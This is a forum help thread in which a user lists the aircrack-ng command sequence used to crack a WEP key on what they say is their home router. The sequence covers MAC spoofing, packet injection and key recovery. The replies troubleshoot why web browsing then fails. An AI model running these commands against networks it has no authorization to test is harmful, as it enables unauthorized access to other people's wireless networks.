Page 1 of 2 12 LastLast

Thread: Problem after cracking WEP

Default Problem after cracking WEP

Hi guys!

I've been testing our router at home by following a couple of tutorials. I was able to crack the key but my problem is what comes after. Usually to test connectivity I just use ping... but one time I tried to surf using firefox it couldn't connect to any website...

here are the steps that i used to crack the wep key(maybe i goofed up somewhere):

Code:
    airmon-ng stop ath0

ifconfig wifi down

macchanger --mac 11:22:33:44:55:66 wifi0

airmon-ng start wifi0

kismet

airodump-ng -c 6 -w weptest --bssid xx:xx:xx:xx:xx:xx ath0

aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -h 11:22:33:44:55:66 -e wifitest ath0

aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h 11:22:33:44:55:66 ath0

aircrack-ng -n 64 -b xx:xx:xx:xx:xx:xx weptest
    i had some problem before connecting to the network with wireless assistant using the key i got from the previous steps. after some searching i found this steps:

Code:
    wlanconfig ath0 destroy

wlanconfig ath0 create wlandev wifi0 wlanmode sta
    After that im able to connect using wireless assistant. when i ping a website like yahoo.com it works. but when i try to open up the same website from a browser, it takes a long time and then eventually times out...

any suggestions?

Sidenote: I can connect using the browser when I don't go through the process of spoofing my MAC.
    Dum spiro spero

Just burned his ISO

Quote Originally Posted by porbista View Post
    Hi guys!

I've been testing our router at home by following a couple of tutorials. I was able to crack the key but my problem is what comes after. Usually to test connectivity I just use ping... but one time I tried to surf using firefox it couldn't connect to any website...

here are the steps that i used to crack the wep key(maybe i goofed up somewhere):

Code:
    airmon-ng stop ath0

ifconfig wifi down

macchanger --mac 11:22:33:44:55:66 wifi0

airmon-ng start wifi0

kismet

airodump-ng -c 6 -w weptest --bssid xx:xx:xx:xx:xx:xx ath0

aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -h 11:22:33:44:55:66 -e wifitest ath0

aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h 11:22:33:44:55:66 ath0

aircrack-ng -n 64 -b xx:xx:xx:xx:xx:xx weptest
    i had some problem before connecting to the network with wireless assistant using the key i got from the previous steps. after some searching i found this steps:

Code:
    wlanconfig ath0 destroy

After that im able to connect using wireless assistant. when i ping a website like yahoo.com it works. but when i try to open up the same website from a browser, it takes a long time and then eventually times out...

any suggestions?

Sidenote: I can connect using the browser when I don't go through the process of spoofing my MAC.
    I'm not too sure, but it sounds like a DNS problem to me. Make sure you have your DNS servers set correctly. That means, you gotta figure out which servers the network is using, which will be in the router config. or point the dns to the router address and see if itll work that way. let me know if that helps...

Do you have a DHCP server running on your router or do you use static IP ?

Try the following:

ifconfig <interface> mode managed
    dhclient <interface>

IMO you're missing the DNS server, thats because you can ping but not surf the net.
    Be sensitive in choosing where you ask your question. You are likely to be ignored, or written off as a loser, if you:

* post your question to a forum where it's off topic
    * post a very elementary question to a forum where advanced technical questions are expected, or vice-versa
    * cross-post to too many different newsgroups
    * post a personal e-mail to somebody who is neither an acquaintance of yours nor personally responsible for solving your problem

I've seen another post about how spoofing the MAC can cause you not to connect. Instead of spoofing the MAC try just exporting your MAC to a variable like so

Code:
    mac=`ifconfig | grep ath0 | cut -d " " -f 10 | tr [a-z] [A-Z]`
    then when you normally have 00:11:22:33:44:55 just put $mac and it will be your real MAC, because when it comes to cracking WEP you dont NEED your MAC to be spoofed. And run the command without the ` ` and the mac= just to make sure it displays your MAC correctly.
    This is a hackers forum :P
    root ~# aircrack-ng pwnd-01.cap
    Lenovo Thinkpad R500, OS: Ubuntu 8.10, BackTrack3, Windows XP (VirtualBox), Windows Vista, Windows 7 beta

thanks for replying guys... however i still can't connect... it's weird cause everything works fine when i don't go through the mac spoofing procedure.. should we focus on that?

whenever i ping i usually use a domain eg. ping yahoo.com... so basically there shouldn't be anything wrong with my connection to the dns server if it is able to resolve this right? im not quite sure...
    Dum spiro spero

thanks for replying guys... however i still can't connect... it's weird cause everything works fine when i don't go through the mac spoofing procedure.. should we focus on that?

whenever i ping i usually use a domain eg. ping yahoo.com... so basically there shouldn't be anything wrong with my connection to the dns server if it is able to resolve this right? im not quite sure...
    Do you have MAC filtering enabled on your ap?
    Tryed another MAC, maybe one of another client instead of 11:22:33:44:55:66 ?
    Did you setup firefox correct? (proxy?)
    Are you running any kind of firewall on your pc / AP ?
    Be sensitive in choosing where you ask your question. You are likely to be ignored, or written off as a loser, if you:

* post a very elementary question to a forum where advanced technical questions are expected, or vice-versa
    * post a personal e-mail to somebody who is neither an acquaintance of yours nor personally responsible for solving your problem

Quote Originally Posted by terminal86 View Post
    Do you have MAC filtering enabled on your ap?
    Tryed another MAC, maybe one of another client instead of 11:22:33:44:55:66 ?
    Did you setup firefox correct? (proxy?)
    Are you running any kind of firewall on your pc / AP ?

no Mac filtering
    yup tried different MAC combinations
    yes, cause firefox works upon first starting up
    no firewall on both the AP and pc

Ok updates in things i've been trying out..

it seems that changing the MAC is not what's causing the problem... i tried to enter just the two lines below and it seems that's what's causing something to go wrong with web browsing...

Code:
    airmon-ng stop ath0
    hope this helps to isolate the possible cause.. times like this i wish it had at least had an error message... that way i'll know what's wrong specifically
    Dum spiro spero

Very good friend of the forum Virchanza's Avatar

11:22:33:44:55

The first octet of that address has its least significant bit set, which means something like "not globally unique address" or "multicast address", which might be why it's being rejected.
    Ask questions on the open forums, that way everybody benefits from the solution, and everybody can be corrected when they make mistakes. Don't send me private messages asking questions that should be asked on the open forums, I won't respond. I decline all "Friend Requests".

Very good friend of the forum Virchanza's Avatar

when i ping a website like yahoo.com it works.
    Then your DNS is working perfectly.

but when i try to open up the same website from a browser, it takes a long time and then eventually times out...
    Check your proxy settings in Firefox, my bet is that it's set to use a proxy.
    Ask questions on the open forums, that way everybody benefits from the solution, and everybody can be corrected when they make mistakes. Don't send me private messages asking questions that should be asked on the open forums, I won't respond. I decline all "Friend Requests".

it seems that changing the MAC is not what's causing the problem... i tried to enter just the two lines below and it seems that's what's causing something to go wrong with web browsing...

Code:
    airmon-ng stop ath0
    Hm that leads me to assume that there is some problem with your driver and the virtual interface.

Instead of creating a new device try to use the original one.
    I'm not sure what syntax the atheros driver uses, but it should look something like this:

Code:
    iwconfig ath0 mode managed
    To recover possible errors start wireshark or something that monitors your connection.
    Let me know if that has any success.

Page 1 of 2 12 LastLast